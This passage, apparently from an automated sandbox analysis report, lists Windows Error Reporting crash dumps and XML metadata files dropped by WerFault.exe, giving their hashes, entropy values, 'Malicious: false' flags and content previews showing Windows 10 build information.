Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3052.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.457591358157864
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTJgtWI98aWgc8sqYjo2s8fm8M4JbHvMFZI+q8vcHvqr8MjT9d:uITft/bgrsqYVRJrOIKqqr8MX9d
MD5:	7FD8A5572F7BE2B113D6061A48014B83
SHA1:	3DD34EED3BD9E30B684132FD1819381E53342F76
SHA-256:	BDCB808BE78464FFBE363AD9145B87C3335188F53031F61559201B6256002A66
SHA-512:	2FA690CAF4D86DA005504D4EA3C1A956922E9EF40CF63D72ADFC6FF8448AF17DC848EEA30804DE04FF789BF2212B8A098822F93621B7C2F89DEE3A601AD68C79
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:41:55 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	50922
Entropy (8bit):	2.273447027047403
Encrypted:	false
SSDEEP:	192:XCINfMGumY1tOPorG9lWpywU+TDN4cAF9ZBGrucwUklXxF2YZwGaZnLKMob6/T:BYePAdywU+Tp4LFirwUmB88wGPK
MD5:	324EEFE49E9D0DEFBD43AEE521306046
SHA1:	374848DE4828FA488E4390BF71237DDA06752171
SHA-256:	445D650A8448E51F28BF71126ABD05AB9CE2E83681D8F185CD7EBE8235FF22CB
SHA-512:	D7A9E62185ADC7BAE4CD76B5531C68111E0B8B89BF2C277BB9176AF2ABD201D8667ED15E69C21D5B613E8A42BF9D68E6F59B3643025F69A96A89EA18802C0791
Malicious:	false
Preview:	MDMP....... .......S.;c........................\................*..........T.......8...........T...........(..............(................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER857A.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8370
Entropy (8bit):	3.6937019660029318
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCb6X6YqrSUZPBgmf6VSjCpBw89b4Ftsf6Im:RrlsNip6X6YWSUZPBgmfkSc4FmfU
MD5:	6C8688EBB7010CFD7C688D3C37E7FCFB
SHA1:	A4917D1D3FD8AC23FADF4BAA75B17340989D3735
SHA-256:	012CE7701033C5376F535AA945C2747E9B84C521C18805A4D88D2CE08812AA7B
SHA-512:	361AB34A7C9488610252967FBFD0E6E7221B27AF4BCAE03FD99D317AD85F559E18DA731982C1E605B7319E1833141AF6F964B12E6570C662B7D15A6B312E0CFA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8618.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.455859214836681
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoh8fm8M4JbHvMFs2LS+q8vcHvqr8MjT9d:uITfq/bgrsqYLJr1Kqqr8MX9d
MD5:	E65AEFCE2C6107E0DA77FA8BE3AF7183
SHA1:	3BEFC6C15F2637E1B509462A38CEF8B5CF5EC7AE
SHA-256:	0DD8637F0DA6959D903215ECE9C21598FAB11544ECB5F28D72C4C35ABCBF75A8
SHA-512:	0646C7A0768AC5672FF073CB466115C3601AA8533A64C1463BEC3B90E5A28EBEE5F65601D910C60D351337D83C4D8B916E1C35C77143A5FB78A6A34B1406FF45
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D78.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:41:58 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	64038
Entropy (8bit):	2.3403867555897593
Encrypted:	false
SSDEEP:	384:PFryPYE0bAAJT0w//lcs11ULFAlwUmr88tXJS7c6RC:gPY5bAAJ4m/us1yRAlIr88tORC
MD5:	70A6A5DE9FED643A38A2B4D83103F43F
SHA1:	127342FFBEAAE048CAC24399ACB45488AF2D51E9
SHA-256:	93797F24E952DDA4AB9E91A3A95F139F9A23CFA4D7141D81B034B3E74E8547C4
SHA-512:	A27B6A7033D9310952B30214AF4A4211C748DA2C8182CAF19FA147129593235ED03627CED493C45C2EFAA948C6790229AB1434461803EB989184DFBF244D7002
Malicious:	false
Preview:	MDMP....... .......V.;c........................4...........T...............T.......8...........T...............F...........0................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F6D.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.6970745210949656
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCZ6Lkh6YqmSUmpGgmf6VSjCpBux89btFtsfwvm:RrlsNir6O6Y7SUmpGgmfkSYtFmfV
MD5:	7759F1A2DF462F27DF8EA98CB6EF34A1
SHA1:	4F59EF97BC312D9538B1C2050FA8848BA45B2997
SHA-256:	3A67760801F5C8F00C4DE9584B71644DF2BDFE52B3A2B5BFD3EA4A2302780D74
SHA-512:	A227DD51D3D049972962193A569895AAAD51064C524B776257A5A949EC101338BBD8560E9DFFCF3224C25D09468BDFBF0FC13F5454F8486652AC0940CBF31B3D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER900A.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.453525744253134
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoP8fm8M4JbHvMFA+q8vcHvqr8MjT9d:uITfq/bgrsqYVJrxKqqr8MX9d
MD5:	5C70F94F1EF1582B9BFE2F4CE377DC70
SHA1:	463E5465615FB5807C58D12AE4593458CD95DA40
SHA-256:	9CC0DCE863AC060D39A32D22C2124BC6D2617DAAC628E848E814C409687C9797
SHA-512:	FE0223271D7E24F0D42AD35D4F586ADBC1ABE0D28D88AD59643E6F7811D3D108EB5B6AB4DF008522DCCAD793DD1E59D294298010EBAB388CD8DDA3E016067906
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94FA.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:00 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79772
Entropy (8bit):	2.037655675391333
Encrypted:	false
SSDEEP:	384:IsLWzLMPzFAGL8+TktyCULFAlwUmx88jpymYMf4t:rW8PzhL8+UwRAlIx88jQN
MD5:	54F01D7297453DC3CFE45337EE0C14A0
SHA1:	54FCC94E3EB987FCA465D35BBCBD2CFB3ADE064C
SHA-256:	EB61EC58D391F3EF1168AEC6A317F0499F14FFCC5E3051FCDCEF80962BC59563
SHA-512:	9044C8DAAEB327D118EB288E85AFFA65187730AF162FDAFD5A1FB37671F2C4F6F4C22E2DFD253FAB3DFF506094E2DA0390A04D2A3B2CD0BFD5E99B7C5CCD97EA
Malicious:	false
Preview:	MDMP....... .......X.;c........................4...........t....7..........T.......8...........T...........p...,............................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96EF.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.6960123490084587
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCY6st6YqASURgYgmf6VSjCpBX89bjFtsfqhm:RrlsNiq6W6YNSURgYgmfkSBjFmfV
MD5:	3BAB7503C3B2BA70B284BDFB0A40D246
SHA1:	C38EBF49B1CB2372B9669EBDF9D0E4E90A6C9886
SHA-256:	96EBEFA82FCCD228A16F3497064584A4AF5192D66248B7AFBA92DFDE530772BD
SHA-512:	85D4045387573010789FE083314D941FF13C4CFD8B0CD80AB717BF32D658DBF6ACA7620EFFA601806947CEE40C4B7B690D0A81893D5F7B66588A87FDA79288C3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.452631514522998
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjou8fm8M4JbHvMFoi+q8vcHvqr8MjT9d:uITfq/bgrsqYyJrliKqqr8MX9d
MD5:	45F886677DB7CEC09B2234D0671E60C3
SHA1:	ED9CB10ED8053EFB9C85CE3478350DF368090106
SHA-256:	6D36ECE4A4FAF1FA823ECEF51231819ACD3B8A25259B6C119E56E619FBCFB325
SHA-512:	AEA39E0D29EC539109EF1ACA3461432E599557DEB065BBD7FF43AAE73D4E4C5CF33A9F13B7A6FE87B49AE5692F66C696E7B90E72C3729E0C1BAE99F46AB2CDD5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C6C.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:02 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79232
Entropy (8bit):	2.0472171480861854
Encrypted:	false
SSDEEP:	384:iHnWzL5Py8i0f/VAGL8+TWhyCULFAlwUmx885tnN8Gg:kWpPy5KL8+ihwRAlIx88538Gg
MD5:	501EBA6100225B651449575A81920354
SHA1:	4DE219267AA09D175C866EDA0443AD9CF573961E
SHA-256:	7ACECEBE0FFA63F119B01E8DD09E0B5F127F2C9D6409075C68E22D9AB12C3427
SHA-512:	73F73F5C73D02EA2D36F83506761F91FB8529BBC66CB504DB719B598824F612CE9190F97959D68A70BE70C4E4F51313C9A2E4DABB51154FEFE7ADF0671DDF5EA
Malicious:	false
Preview:	MDMP....... .......Z.;c........................4................7..........T.......8...........T...........p................................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EA0.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8390
Entropy (8bit):	3.6974924360346533
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCjJ6+6YqpSUAjcgmf6VSjCpBP89bxFtsfnk7m:RrlsNiJJ6+6YkSUAjcgmfkSJxFmfF
MD5:	84FBCF6B924692D26B6E030DBC2B434B
SHA1:	EC857E5FC4585AD1EDEC09794A0EFA94FA49008C
SHA-256:	6BEE6EE9C2E11BBA8FD5056DF1F1119910E5FEA3501086E4482208EF1FC660BF
SHA-512:	704F8C81EA8893767F44B40FACE4396B9A524762E0548794BF3CC117771F429879B7CDC2C613B76905AF1A99145215ACA33D5336A75B3D65B42A685C68B841A8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F2D.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456122924723511
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoz8fm8M4JbHvMFO/+q8vcHvqr8MjT9d:uITfq/bgrsqYBJrHKqqr8MX9d
MD5:	0088B2AD01BBBE453F23265547F12EF2
SHA1:	2692AA3B1D7A55AA66F86EEE35B55F5EB3801852
SHA-256:	F481B14753FEEC023063B853F47AC6D088F880311814D1F3A59B58AC8BA7A3E0
SHA-512:	91E68A5849A548F72A72B05ADFB2F2B295BA7968A9C9222C2DABC97524917F92E706BFD81AA9AD979CB8B8E0FFC0212537D76280E85D219DCC7FB6978FDA767F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA536.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:04 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79264
Entropy (8bit):	2.0877625606385917
Encrypted:	false
SSDEEP:	384:EVGWzL2hPk1gzuL8+TWko7salytULFAlwUmx885dWxy8/KGu:tWGhPkiuL8+i8iTRAlIx885gxXK
MD5:	470818919662D307B6A19FA50D2987CA
SHA1:	E25D3E406E869249EC2FCAD4C0D81A7F0C843B94
SHA-256:	8EC4090C8071CD8A57B013F96AA05D27DE35D7837352B87C4B5EB95B9097D3B0
SHA-512:	2F88968352E427DD3118DC91435E9772F829BA98154F14242D2CB418F6920C352E6B9D730533B64538E759A9E1D487490D228A95A204800B2B4E6E37FCF3001D
Malicious:	false
Preview:	MDMP....... .......\.;c........................4................7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA72B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8390
Entropy (8bit):	3.6953104011768794
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCP6K66YqUSUWCPgmf6VSjCpBV89bHFtsfKtm:RrlsNiN6n6YZSUWCPgmfkSLHFmfJ
MD5:	1636ADDDB6C0F6E53F832434BBEFB6BD
SHA1:	C6ECD3F882F2625D7549A5673B7B479CE5D39201
SHA-256:	D9F02508430FD725808D67DA0D1C5564644A412A0F9F39A1E18120318AD3659F
SHA-512:	EC055C3C8191FA980530FEF070F3FCC7B4D97E580D862F745196175AD9709103202766FD3D3E00B4B7BE890354CFA9DD97CA46D286D54E8C67EA725412F3BFB6
Malicious:	false
